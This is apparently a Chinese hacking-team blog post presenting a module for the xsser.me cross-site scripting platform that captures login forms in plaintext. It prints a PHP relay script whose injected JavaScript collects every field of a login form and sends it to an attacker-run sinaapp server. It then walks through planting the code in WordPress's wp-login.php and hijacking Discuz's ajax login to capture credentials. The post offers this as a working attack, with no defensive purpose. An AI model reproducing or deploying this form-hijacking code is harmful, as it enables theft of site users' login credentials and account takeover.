C0dePlay Xss 通用记录明文(表单劫持)

平台基于xsser.me for sae http://xsserme.sinaapp.com/download.php

模块编写

新建模块 如下图

因为里面逻辑判断和数据转化较多 需要个php脚本来转发

php转发脚本代码

转发文件的源码为:

<?php
/**
 * @desc   转发文件
 * @team   C0dePlay Team         
 * @author Yaseng WwW.Yaseng.Me [Yaseng@UAUC.NET]
 */
 ini_set('display_errors', 'Off');
 $id=$_GET['id'];
 if($_GET['y']){

 	$funcname=$_GET['funcname'];
    $formname='"'.$_GET['formname'].'"';
    $formid='"'.$_GET['formid'].'"';

 	echo "
 	var  xurl='http://xxx.sinaapp.com/xxxxx/xform.php?id={$id}';
 	var form= ( $formname ) ?  document.forms[$formname] :  document.getElementById($formid);

 	";

 	if($funcname){

 	 echo 'function getForm(e){var t,n="",r="",i,s;for(t=0;t<e.length;t++){i=e[t];if(i.name!=""){if(i.type=="select-one")s=i.options[i.selectedIndex].value;else if(i.type=="checkbox"||i.type=="radio"){if(i.checked==0)continue;s=i.value}else{if(i.type=="button"||i.type=="submit"||i.type=="reset"||i.type=="image")continue;s=i.value}s=encodeURIComponent(s),n+=r+i.name+"="+s,r="&amp;"}}return n} '." 
     $funcname=xss.proxy($funcname,function(){
               xss.ajax(xurl,getForm(form));

   	    })"
 	 ;

 	}else{

 		echo 'xss.xform(form,xurl);';

 	}

 }else{

 $url=$_SERVER['HTTP_REFERER'];
 $data="";
  foreach($_REQUEST as $k=>$v){

  	$data.="|$k=$v";

  }

file_get_contents("http://xxx.sinaapp.com/index.php?do=api&amp;id={$id}&amp;data={$data}&amp;url={$url}");

 }

?>

注:里面javascript代码基于 xss.js库 地址:http://pujun.li/xss.js sogili

使用演示

一:普通表单提交 (wordpress 示范)

利用表单劫持实现
第一步:新建项目 选择 xss.js模块 和通用明文记录填写配置
以wordpress为例 看后台登陆表单:

<form name="loginform" id="loginform" action="" method="post">

第二步:插入xss 代码 wp-login.php
第三步:爆菊

ajax提交表单 (discuz 示范)

利用函数劫持实现
第一步:新建项目 选择 xss.js模块 和通用明文记录填写配置
以discuz 为例 看登陆表单:
http://w/uauc/dg2.5/member.php?mod=logging&action=login

<form method="post" autocomplete="off" name="login" id="loginform_LIsAS" class="cl" onsubmit="pwdclear = 1;ajaxpost('loginform_LIsAS', 'returnmessage_LIsAS', 'returnmessage_LIsAS', 'onerror');return false;" action="member.php?mod=logging&amp;amp;action=login&amp;amp;loginsubmit=yes&amp;amp;loginhash=LIsAS">

创建项目

演示视频

视频地址:http://v.youku.com/v_show/id_XNTY0NTk1NzY0.html (可选择高清全屏观看)
高清无码: http://pan.baidu.com/share/link?shareid=484431&uk=587894688

后言

Xsser 程序确实比较强大,本文只是抛砖引玉,大家可以参考本文diy各种猥琐模块…..